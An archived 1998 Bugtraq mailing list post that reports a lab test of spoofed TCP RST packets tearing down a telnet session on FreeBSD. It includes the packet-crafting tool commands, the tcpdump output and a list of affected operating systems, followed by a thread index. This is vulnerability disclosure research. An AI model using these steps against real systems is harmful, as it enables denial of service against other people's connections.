Bugtraq mailing list archives
Re: FreeBSD's RST validation
From: oliver () SECNET COM (Oliver Friedrichs)
Date: Mon, 31 Aug 1998 13:36:35 -0600
Darren Reed brought this up in June, 1997, on the NetBSD security list, after which I performed some tests. I ended up with a number of questions after doing this, but never followed up to determine what was going on. Anyways, here's my old message - Oliver Network Associates, Inc. ------ Ok, here's how my tests turned out: I have 3 systems involved: 199.185.231.20 - OpenBSD system 199.185.231.24 - FreeBSD system 199.185.231.25 - BSDI system I'm telneted from BSDI to FreeBSD, and monitoring and spoofing from the OpenBSD system using tcpdump and CAPE. 20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 <nop,nop,timestamp 750118 2277749> [tos 0x10] 20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 1:55(54) ack 1 win 17376 <nop,nop,timestamp 2278005 750118> (DF) [tos 0x10] So I'm logged into FreeBSD from port 3349 on the BSDI system. On OpenBSD.. bash# ./cape -i Welcome to CAPE. "help" for general help, "help topic" for help on topic Active network interfaces: - Interface: lo0 Address: 127.0.0.1 - Interface: ed2 Address: 199.185.231.20 cape> iface=ed2 cape> gateway=199.185.231.24 cape> ip cape> ip_src=199.185.231.23 cape> ip_dst=199.185.231.24 cape> ip_proto=IPPROTO_TCP cape> tcp cape> tcp_sport=3349 cape> tcp_dport=23 cape> tcp_flags=RST cape> send Processing: Packet transmitted Here's my spoofed packet with random seq/ack numbers: 20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096 As soon as I hit a key on the FreeBSD system... [20:25:01] [freebsd] [/usr/local/scanner] % Connection closed by foreign host. Poof, it works, repeatable every time. This works when spoofing the packet from the BSDI system TO the FreeBSD system. For some reason (which I've been unable to figure out yet, I cannot spoof packets from the FreeBSD system to the BSDI system and have this work). This works between OpenBSD and FreeBSD however (both ways). This doesn't work against Solaris. Here's what I found with the systems here: OpenBSD 2.1 - vulnerable FreeBSD 2.1.x - vulnerable BSDI - appears not vulnerable (?) Solaris 2.5 - appears not vulnerable IRIX 6.2 - appears not vulnerable Linux - appears not vulnerable Windows NT - appears not vulnerable
Current thread:
- Re: Buffer overflows in Minicom 1.80.1, (continued)
- Re: Buffer overflows in Minicom 1.80.1 Wichert Akkerman (Aug 31)
- buffer overflow in nslookup? Peter van Dijk (Aug 29)
- Re: buffer overflow in nslookup? Brandon Reynolds (Aug 29)
- Re: buffer overflow in nslookup? Peter van Dijk (Aug 30)
- FreeBSD's RST validation Tristan Horn (Aug 30)
- Re: FreeBSD's RST validation James Snow (Aug 30)
- Re: FreeBSD's RST validation Tristan Horn (Aug 30)
- port scanning. (fwd) Darren Reed (Aug 31)
- Re: FreeBSD's RST validation Andrey Alekseyev (Aug 31)
- Re: FreeBSD's RST validation Diane Bruce (Aug 30)
- Re: FreeBSD's RST validation Oliver Friedrichs (Aug 31)
- SEYON vulnerability in TurboLinux 2.0 Scott Stone (Aug 30)
- Re: buffer overflow in nslookup? www.devoid.net (Aug 30)
- Re: buffer overflow in nslookup? Benjamin J Stassart (Aug 30)
- Re: buffer overflow in nslookup? Theo de Raadt (Aug 31)
- Re: buffer overflow in nslookup? Uwe Ohse (Aug 31)
- Hole in Oracle Server/Developer 2000 - authentication protocol. Yaron Yanay (Aug 31)
- Re: buffer overflow in nslookup? Willy TARREAU (Aug 31)